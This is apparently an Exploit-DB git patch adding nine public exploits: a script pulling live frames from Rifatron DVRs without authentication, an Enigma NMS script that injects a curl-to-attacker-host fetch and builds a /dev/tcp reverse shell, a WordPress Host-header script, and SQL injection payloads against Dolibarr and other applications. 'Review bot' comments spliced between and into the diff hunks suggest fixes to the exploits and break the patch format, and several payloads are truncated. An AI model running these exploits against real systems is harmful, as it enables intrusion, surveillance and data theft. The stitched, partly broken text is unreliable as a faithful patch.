From fcce3705a3422aa883b69ce8880af0b25ee55636 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 10 Sep 2019 05:02:21 +0000
Subject: [PATCH] DB: 2019-09-10
9 changes to exploits/shellcodes
WordPress 5.2.3 - Cross-Site Host Modification
Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection
Enigma NMS 65.0.0 - Cross-Site Request Forgery
Enigma NMS 65.0.0 - OS Command Injection
Enigma NMS 65.0.0 - SQL Injection
Online Appointment - SQL Injection
Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure
WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting
Dolibarr ERP-CRM 10.0.1 - SQL Injection
---
 exploits/cgi/webapps/47368.sh | 75 ++++++++++++++
 exploits/multiple/webapps/47363.html | 69 +++++++++++++
 exploits/multiple/webapps/47364.py | 66 +++++++++++++
 exploits/multiple/webapps/47365.txt | 23 +++++
 exploits/php/webapps/47361.pl | 91 +++++++++++++++++
 exploits/php/webapps/47362.txt | 49 ++++++++++
 exploits/php/webapps/47366.txt | 39 ++++++++
 exploits/php/webapps/47369.txt | 17 ++++
 exploits/php/webapps/47370.txt | 140 +++++++++++++++++++++++++++
 files_exploits.csv | 9 ++
 10 files changed, 578 insertions(+)
 create mode 100755 exploits/cgi/webapps/47368.sh
 create mode 100644 exploits/multiple/webapps/47363.html
 create mode 100755 exploits/multiple/webapps/47364.py
 create mode 100644 exploits/multiple/webapps/47365.txt
 create mode 100755 exploits/php/webapps/47361.pl
 create mode 100644 exploits/php/webapps/47362.txt
 create mode 100644 exploits/php/webapps/47366.txt
 create mode 100644 exploits/php/webapps/47369.txt
 create mode 100644 exploits/php/webapps/47370.txt
diff --git a/exploits/cgi/webapps/47368.sh b/exploits/cgi/webapps/47368.sh
new file mode 100755
index 000000000..4bc3182fa
--- /dev/null
+++ b/exploits/cgi/webapps/47368.sh
@@ -0,0 +1,75 @@
+#!/bin/bash
+#
+#
+# Rifatron Intelligent Digital Security System (animate.cgi) Stream Disclosure
+#
+#
+# Vendor: Rifatron Co., Ltd. | SAM MYUNG Co., Ltd.
+# Product web page: http://www.rifatron.com
+# Affected version: 5brid DVR (HD6-532/516, DX6-516/508/504, MX6-516/508/504, EH6-504)
+# 7brid DVR (HD3-16V2, DX3-16V2/08V2/04V2, MX3-08V2/04V2)
+# Firmware: <=8.0 (000143)
+#
+#
+# Summary: Rifatron with its roots in Seoul, Korea has been supplying and
+# servicing the security market as a leading CCTV/video surveillance security
+# system manufacturer, specializing in stand-alone digital video recorder since
+# 1998. We are known for marking the first standalone DVR with audio detection
+# and 480 frames per secone(fps) and have been focusing on highend products and
+# large projects in a variety applications and merket. These include government
+# and public services, banking and finance, hotels and entertatinment, retail
+# education, industrial and commercial sectors throughout Europe, Middle East,
+# the U.S. and Asia. Based on the accumulated know-how in the security industry,
+# Rifatron is trying its utmost for the technology development and customer
+# satisfaction to be the best security solution company in the world.
+#
+# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
+# disclosure when animate.cgi script is called through Mobile Web Viewer module.
+#
+# Tested on: Embedded Linux
+# Boa/0.94.14rc21
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+# @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5532
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5532.php
+#
+#
+# 03.09.2019
+#
+
+#{PoC}
+#
+set -euo pipefail
+IFS=$'\n\t'
+if [ "$#" -ne 2 ]; then
+ echo "Usage: $0 IP:PORT CHANNEL" # Valid channel integers: 0-15
+ echo "Ex.: $0 10.9.8.7:65432 10"
+ exit
+fi
+IP=$1
+CHANNEL=$2
+HOST="http://$IP/cgi-bin/animate.cgi?$CHANNEL"
+STATUS=$(curl -Is http://$IP/mobile_viewer_login.html 2>/dev/null | head -1 | awk -F" " '{print $2}')
+if [ "$STATUS" == "404" ]; then
+ echo "Target not vulnerable!"
+ exit
+fi
+echo "Collecting snapshots..."
+for x in {1..10};
+ do echo -ne $x
+ curl "$HOST" -o sequence-$x.jpg -#;
+ sleep 0.6
+ done
+echo -ne "\nDone."
+echo -ne "\nRendering video..."
+ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i sequence-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p video.mp4
+echo " done."
+echo -ne "\nRunning animation..."
+sleep 1
+cvlc video.mp4 --verbose -1 -f vlc://quit
+#
+#{/PoC}
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47363.html b/exploits/multiple/webapps/47363.html
new file mode 100644
index 000000000..053c7c172
--- /dev/null
+++ b/exploits/multiple/webapps/47363.html
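Review bot: The reachability check only rejects a 404, so a timeout, a refused connection or any other status leaves `STATUS` empty or non-200 and the script goes on to pull frames anyway; and because stderr is discarded, a failed `curl` inside `STATUS=$(...)` will, as far as I can tell, abort the script silently under `set -euo pipefail` with no message. Test the positive case and exit non-zero: `if [ "$STATUS" != "200" ]; then echo "Target not vulnerable (HTTP ${STATUS:-no response})"; exit 1; fi`. The snapshot loop also writes whatever `animate.cgi` returns into `sequence-$x.jpg`, so a login page or error body is saved as an image and only `ffmpeg` complains later; `curl -fsS "$HOST" -o "sequence-$x.jpg"` makes a non-2xx response fail the loop at the point it happens. The usage branch should likewise `exit 1` rather than `exit`.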
@@ -0,0 +1,69 @@
+#--------------------------------------------------------------------#
+# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF) #
+# Date: 21 July 2019 #
+# Author: Mark Cross (@xerubus | mogozobo.com) #
+# Vendor: NETSAS Pty Ltd #
+# Vendor Homepage: https://www.netsas.com.au/ #
+# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
+# Version: Enigma NMS 65.0.0 #
+# CVE-IDs: CVE-2019-16068 #
+# Full write-up: https://www.mogozobo.com/?p=3647 #
+#--------------------------------------------------------------------#
+ _ _
+ ___ (~ )( ~)
+ / \_\ \/ /
+| D_ ]\ \/ -= Enigma CSRF by @xerubus =-
+| D _]/\ \ -= We all have something to hide =-
+ \___/ / /\ \\
+ (_ )( _)
+ @Xerubus
+
+The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/multiple/webapps/47364.py b/exploits/multiple/webapps/47364.py
new file mode 100755
index 000000000..db743e07b
--- /dev/null
+++ b/exploits/multiple/webapps/47364.py
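Review bot: The PoC body is missing — after "The following CSRF will create a PHP file ..." the hunk holds only empty lines, so the forged request (target path, the upload field names and the PHP payload) that the sentence announces is not in the listing; if it was dropped as markup during extraction, the entry should still describe that request in plain text so it can be reproduced. In an `.html` file the `#` header and banner are not comments: a victim who loads the page sees the advisory text rendered as body content, so the header belongs inside `<!-- ... -->` if the file is meant to be served as the CSRF page. The precondition should also be stated: the forgery only works while the victim holds an authenticated NMS session that is allowed to use the user-upload function, which the description leaves implicit.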
@@ -0,0 +1,66 @@
+#!/usr/bin/python
+#--------------------------------------------------------------------#
+# Exploit Title: Enigma NMS OS Command Injection #
+# NETSAS Pty Ltd Enigma NMS #
+# Date: 21 July 2019 #
+# Author: Mark Cross (@xerubus | mogozobo.com) #
+# Vendor: NETSAS Pty Ltd #
+# Vendor Homepage: https://www.netsas.com.au/ #
+# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
+# Version: Enigma NMS 65.0.0 #
+# CVE-IDs: CVE-2019-16072 #
+# Full write-up: https://www.mogozobo.com/?p=3647 #
+#--------------------------------------------------------------------#
+
+import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading
+
+os.system('clear')
+
+print("""\
+ _ _
+ ___ (~ )( ~)
+ / \_\ \/ /
+| D_ ]\ \/ -= Enigma NMS Reverse Shell by @xerubus =-
+| D _]/\ \ -= We all have something to hide =-
+ \___/ / /\ \\
+ (_ )( _)
+ @Xerubus
+ """)
+
+enigma_host = raw_input("Enter Enigma NMS IP address:\t")
+attack_host = raw_input("Enter Attacker IP address:\t")
+rev_sh_port = raw_input("Enter reverse shell port:\t")
+web_svr_port = raw_input("Enter web server port:\t\t")
+user = raw_input("Enter Username:\t\t\t")
+os.system("stty -echo")
+password = raw_input("Enter Password (no echo):\t")
+os.system("stty echo")
+
+enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
+enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": 
"1"} + +print "\n\n[+] Building PHP reverse shell" +f=open("evil.php","w") +f.write("& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n") +f.close() + +# Create simple webserver hosting evil php file +print "[+] Hosting PHP reverse shell" +web_svr_port = str(web_svr_port) +web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid) + +# Create netcat listener +print "[+] Creating listener on port " + rev_sh_port +subprocess.Popen(["nc", "-nvlp", rev_sh_port]) + +# Send payload to Enigma NMS +print "[+] Sending payload\n" +try: + r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password)) +except: + pass + +print "\n[+] Cleaning up mess..." + +# Shut down http server +os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM) \ No newline at end of file diff --git a/exploits/multiple/webapps/47365.txt b/exploits/multiple/webapps/47365.txt new file mode 100644 index 000000000..0cb61aaa9 --- /dev/null +++ b/exploits/multiple/webapps/47365.txt 
@@ -0,0 +1,23 @@
+#--------------------------------------------------------------------#
+# Exploit Title: Enigma NMS search_pattern SQL Injection #
+# Date: 21 July 2019 #
+# Author: Mark Cross (@xerubus | mogozobo.com) #
+# Vendor: NETSAS Pty Ltd #
+# Vendor Homepage: https://www.netsas.com.au/ #
+# Software Link: https://www.netsas.com.au/enigma-nms-introduction/ #
+# Version: Enigma NMS 65.0.0 #
+# CVE-IDs: CVE-2019-16065 #
+# Full write-up: https://www.mogozobo.com/?p=3647 #
+#--------------------------------------------------------------------#
+ _ _
+ ___ (~ )( ~)
+ / \_\ \/ /
+| D_ ]\ \/ -= Enigma SQLi by @xerubus =-
+| D _]/\ \ -= We all have something to hide =-
+ \___/ / /\ \\
+ (_ )( _)
+ @Xerubus
+
+Request: http:///cgi-bin/protected/manage_hosts_short.cgi?action=search_proceed&search_pattern=
+Vulnerable Parameter: search_pattern (GET)
+Payload: action=search_proceed&search_pattern=a%' AND SLEEP(5) AND '%'='
\ No newline at end of file
diff --git a/exploits/php/webapps/47361.pl b/exploits/php/webapps/47361.pl
new file mode 100755
index 000000000..cd46f1626
--- /dev/null
+++ b/exploits/php/webapps/47361.pl
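Review bot: The payload is given only in decoded form — `a%' AND SLEEP(5) AND '%'='` — but `%'` is not a valid percent-escape in a query string and the spaces and quotes need encoding too, so it cannot be pasted into the `search_pattern=` GET request as written; say that it is the decoded value and add the wire form, `search_pattern=a%25%27+AND+SLEEP(5)+AND+%27%25%27%3D%27`. The request line `http:///cgi-bin/protected/...` has an empty host placeholder, and the `/cgi-bin/protected/` path suggests an authenticated context; the entry should name the role required so readers can tell pre-auth from post-auth impact. A note on how the time-based result is observed (the 5 s delay on the response) would make the PoC self-contained.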
@@ -0,0 +1,91 @@
+#!/usr/bin/perl -w
+#
+# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
+#
+# Copyright 2019 (c) Todor Donev
+#
+# Type: Remote
+# Risk: High
+#
+# Solution:
+# Set security headers to web server and no-cache for Cache-Control
+#
+# Simple Attack Scenarios:
+#
+# o This attack can bypass Simple WAF to access restricted content on the web server,
+# something like phpMyAdmin;
+#
+# o This attack can deface the vulnerable Wordpress website with content from the default vhost;
+#
+# Disclaimer:
+# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
+# caused by direct or indirect use of the information or functionality provided by these programs.
+# The author or any Internet provider bears NO responsibility for content or misuse of these programs
+# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
+# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+# # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
+# # ====================================================================================
+# # Author: Todor Donev 2019 (c)
+# # > Host => default-vhost.com
+# # > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
+# # > Content-Type => application/x-www-form-urlencoded
+# # < Connection => close
+# # < Date => Fri, 06 Sep 2019 11:39:43 GMT
+# # < Location => https://default-vhost.com/
+# # < Server => nginx
+# # < Content-Type => text/html; charset=UTF-8
+# # < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
+# # < Client-Peer => 13.37.13.37:443
+# # < Client-Response-Num => 1
+# # < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
+# # < Client-SSL-Cert-Subject => /CN=default-vhost.com
+# # < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
+# # < Client-SSL-Socket-Class => IO::Socket::SSL
+# # < Client-SSL-Warning => Peer certificate not verified
+# # < Client-Transfer-Encoding => chunked
+# # < Strict-Transport-Security => max-age=31536000;
+# # < X-Powered-By => PHP/7.3.9
+# # < X-Redirect-By => WordPress
+# # ====================================================================================
+#
+#
+#
+use strict;
+use v5.10;
+use HTTP::Request;
+use LWP::UserAgent;
+use WWW::UserAgent::Random;
+
+
+my $host = shift || '';
+my $attacker = shift || 'default-vhost.com';
+
+
+say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
+# ====================================================================================
+# Author: Todor Donev 2019 (c) ";
+if ($host !~ m/^http/){
+say "# e.g. 
perl $0 https://target:port/ default-vhost.com";
+exit;
+}
+
+my $user_agent = rand_ua("browsers");
+my $browser = LWP::UserAgent->new(
+ protocols_allowed => ['http', 'https'],
+ ssl_opts => { verify_hostname => 0 }
+ );
+ $browser->timeout(10);
+ $browser->agent($user_agent);
+
+my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " ");
+$request->header("Host" => $attacker);
+my $response = $browser->request($request);
+say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
+say "# > $_ => ", $request->header($_) for $request->header_field_names;
+say "# < $_ => ", $response->header($_) for $response->header_field_names;
+say "# ====================================================================================";
\ No newline at end of file
diff --git a/exploits/php/webapps/47362.txt b/exploits/php/webapps/47362.txt
new file mode 100644
index 000000000..011722ea0
--- /dev/null
+++ b/exploits/php/webapps/47362.txt
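Review bot: The script never checks for the behaviour it claims to demonstrate — it dumps every request and response header and leaves the reader to notice whether `Location` echoes the attacker-supplied `Host`; add a verdict after the request, `my $loc = $response->header('Location') // ''; say $loc =~ /\Q$attacker\E/ ? "# Host reflected in Location: $loc" : "# Location does not reflect Host";`. What the sample output shows is a redirect built from the supplied Host header, and nothing in the script distinguishes a WordPress code path from the front-end server's default-vhost handling, so the `Wordpress <= 5.2.3` attribution in the header should either name the responsible WordPress behaviour or be hedged. `ssl_opts => { verify_hostname => 0 }` disables certificate checks for the target connection (the `Client-SSL-Warning => Peer certificate not verified` line in the sample output is the result); that is a reasonable PoC choice but deserves a comment, since the tool will not notice a TLS-intercepting middlebox. The "Solution" in the header ("security headers" and "no-cache") does not follow from the finding; the fix for a Host-derived redirect is to build redirects from the configured site URL and make the default vhost refuse unknown Host values.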
@@ -0,0 +1,49 @@ +# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection +# Exploit Author: Metin Yunus Kandemir (kandemir) +# Vendor Homepage: https://www.dolibarr.org/ +# Software Link: https://www.dolibarr.org/downloads +# Version: 10.0.1 +# Category: Webapps +# Tested on: Xampp for Linux +# Software Description : Dolibarr ERP & CRM is a modern and easy to use +software package to manage your business... +================================================================== + + +elemid (POST) - Sql injection PoC + + +POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php +Content-Type: application/x-www-form-urlencoded +Content-Length: 143 +Cookie: +DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45 +Connection: close +Upgrade-Insecure-Requests: 1 + +token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi] + + + +Parameter: elemid (POST) + Type: error-based + Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (EXTRACTVALUE) + Payload: +token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0 +AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT +(ELT(7549=7549,1))),0x7176787a71)) + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: +token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0 +AND (SELECT 6353 FROM 
(SELECT(SLEEP(5)))aOzn) \ No newline at end of file diff --git a/exploits/php/webapps/47366.txt b/exploits/php/webapps/47366.txt new file mode 100644 index 000000000..e6140d346 --- /dev/null +++ b/exploits/php/webapps/47366.txt @@ -0,0 +1,39 @@ +# Exploit Title: Online Appointment SQL Injection +# Data: 07.09.2019 +# Exploit Author: mohammad zaheri +# Vendor HomagePage: https://github.com/girish03/Online-Appointment-Booking-System +# Tested on: Windows +# Google Dork: N/A + + +========= +Vulnerable Page: +========= +Online-Appointment-Booking-System-master/signup.php + + +========== +Vulnerable Source: +========== +Line 52: $name=$_POST['fname']; +Line 53: $gender=$_POST['gender']; +Line 54: $dob=$_POST['dob']; +Line 55: $contact=$_POST['contact']; +Line 56: $email=$_POST['email']; +Line 57: $username=$_POST['username']; +Line 58: $password=$_POST['pwd']; +Line 59: $prepeat=$_POST['pwdr']; +Line 62: if (mysqli_query($conn, $sql)) + +========= +POC: +========= +http://site.com/Online-Appointment-Booking-System-master/signup.php?sql=[SQL] + + + +========= +Contact Me : +========= +Telegram : @m_zhrii +Email : neoboy503@gmail.com \ No newline at end of file diff --git a/exploits/php/webapps/47369.txt b/exploits/php/webapps/47369.txt new file mode 100644 index 000000000..e7a022f17 --- /dev/null +++ b/exploits/php/webapps/47369.txt 
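Review bot: The PoC needs a valid `DOLSESSID_...` cookie and a `token` value that is bound to that session, so this is an authenticated injection and the entry should state the minimum privilege required (a user allowed to reach `action=addintocategory` on `categories/viewcat.php`); the cookie and token values shown come from the tester's session and will not work elsewhere, which is worth saying explicitly. `elemid` presumably identifies the product being added to the category, i.e. an integer — if that holds, the obvious remediation is to cast it on read before it reaches the query, to be confirmed against `viewcat.php`. The entry carries no CVE or vendor fix reference, and neither does 47370 for the same version; a pointer to the fixed release would help readers triage.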
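Review bot: The PoC does not match the source it quotes: the listed lines 52–59 read `$_POST['fname']`, `$_POST['username']`, `$_POST['pwd']` and so on, yet the request given is a GET to `signup.php?sql=[SQL]`, and no `sql` parameter appears in the quoted code at all. The lines that actually assemble `$sql` (60–61, between the assignments and the `mysqli_query($conn, $sql)` on line 62) are the ones that would show the concatenation and are omitted, so as written the entry is not reproducible. It should quote the `$sql = ...` line and give a POST body with the injection in whichever of the listed fields is concatenated into it, rather than an invented GET parameter.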
@@ -0,0 +1,17 @@ +# Exploit Title: WordPress Plugin Sell Downloads 1.0.86 - Cross Site Scripting +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan@gmail.com +# Discovery Date: September 09,2019 +# Vendor Homepage: https://wordpress.dwbooster.com/content-tools/sell-downloads +# Software Link : https://wordpress.org/plugins/sell-downloads/ +# Tested Version: 1.0.86 +# Tested on: Parrot OS, Wordpress 5.1.1 + + +# PoC: +1- Go to "Products for Sale" section +2- Click on "Add New" +3- In opend window click on "Add Comment" +4- Fill comment as "/> or "/> +5- Click on "Publish" (or "Update" if you editing an existing product) +6- You will see a pop-up (also if click on input), Also if you go to product link will see the pop-up. \ No newline at end of file diff --git a/exploits/php/webapps/47370.txt b/exploits/php/webapps/47370.txt new file mode 100644 index 000000000..3301791df --- /dev/null +++ b/exploits/php/webapps/47370.txt 
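Review bot: Step 4 reads `Fill comment as "/> or "/>` — the payload has been reduced to its closing fragment, so the script the steps depend on is not in the entry (probably stripped as markup) and should be spelled out with the angle brackets entity-encoded so it survives rendering. The steps go through the plugin's "Products for Sale" > "Add New" screen, which implies a back-end user; the entry should say which role reproduces it, because on a single-site WordPress install administrators hold `unfiltered_html` and stored XSS placed by an administrator into their own product page is not a privilege boundary. Stating where the value is echoed — the comment input on the edit screen versus the public product page in step 6 — would make the impact of each pop-up location clear.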
@@ -0,0 +1,140 @@ +# Exploit Title: Dolibarr ERP/CRM - Multiple Sql Injection +# Exploit Author: Metin Yunus Kandemir (kandemir) +# Vendor Homepage: https://www.dolibarr.org/ +# Software Link: https://www.dolibarr.org/downloads +# Version: 10.0.1 +# Category: Webapps +# Tested on: Xampp for Linux +# Software Description : Dolibarr ERP & CRM is a modern and easy to use +software package to manage your business... +================================================================== + + +actioncode (POST) - Sql injection PoC + +http request: + +POST /dolibarr-10.0.1/htdocs/comm/action/card.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://localhost/dolibarr-10.0.1/htdocs/comm/action/card.php?action=edit&id=774 +Content-Type: application/x-www-form-urlencoded +Content-Length: 610 +Cookie: +DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3 +Connection: close +Upgrade-Insecure-Requests: 1 + +token=%242y%2410%24hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW%2FIC0mt8vk7%2FGTtU8a&action=update&id=774&ref_ext=&actioncode=[SQLi]&label=Product+created&ap=09%2F05%2F2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09%2F05%2F2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save + + + +Parameter: actioncode (POST) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or +GROUP BY clause + Payload: +token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO' +RLIKE (SELECT (CASE WHEN (5096=5096) THEN 0x41435f4f54485f4155544f ELSE +0x28 END))-- 
+HQaG&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + Payload: +token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO' +AND (SELECT 1665 FROM(SELECT COUNT(*),CONCAT(0x716b707871,(SELECT +(ELT(1665=1665,1))),0x7170707071,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- +XqJd&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: +token=$2y$10$hG2u8WGSj3ynCl99dYPZGejK322YaCxkfSRW/IC0mt8vk7/GTtU8a&action=update&id=774&ref_ext=&actioncode=AC_OTH_AUTO' +AND (SELECT 6833 FROM (SELECT(SLEEP(5)))gCwf)-- +jPLl&label=Product+created&ap=09/05/2019&apday=05&apmonth=09&apyear=2019&aphour=16&apmin=59&apsec=10&p2=09/05/2019&p2day=05&p2month=09&p2year=2019&p2hour=16&p2min=59&p2sec=10&complete=-1&location=&removedassigned=&assignedtouser=-1&socid=-1&projectid=0&priority=&fk_element=178&elementtype=product¬e=Author%3A+admin%3Cbr%3E%0D%0AProduct+created&edit=Save + +. +. +. +. +. 
+ +demand_reason_id, availability_id (POST) - Sql injection PoC + +http request: + +POST /dolibarr-10.0.1/htdocs/comm/propal/card.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +http://localhost/dolibarr-10.0.1/htdocs/comm/propal/card.php?action=create&leftmenu=propals +Content-Type: application/x-www-form-urlencoded +Content-Length: 471 +Cookie: +DOLSESSID_60ec554596b730ca6f03816d85cd400a=aaf3a3b284478257b59be81cf1a70fc3 +Connection: close +Upgrade-Insecure-Requests: 1 + +token=%242y%2410%24L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09%2F09%2F2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=[SQLi]&availability_id=[SQLi]&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty + + + +Parameter: demand_reason_id (POST) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or +GROUP BY clause + Payload: +token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0 +RLIKE (SELECT (CASE WHEN (8405=8405) THEN 0 ELSE 0x28 +END))&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + Payload: 
+token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0 +OR (SELECT 8076 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT +(ELT(8076=8076,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY +x)a)&availability_id=0&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty + +. +. + +Parameter: availability_id (POST) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or +GROUP BY clause + Payload: +token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0 +RLIKE (SELECT (CASE WHEN (6909=6909) THEN 0 ELSE 0x28 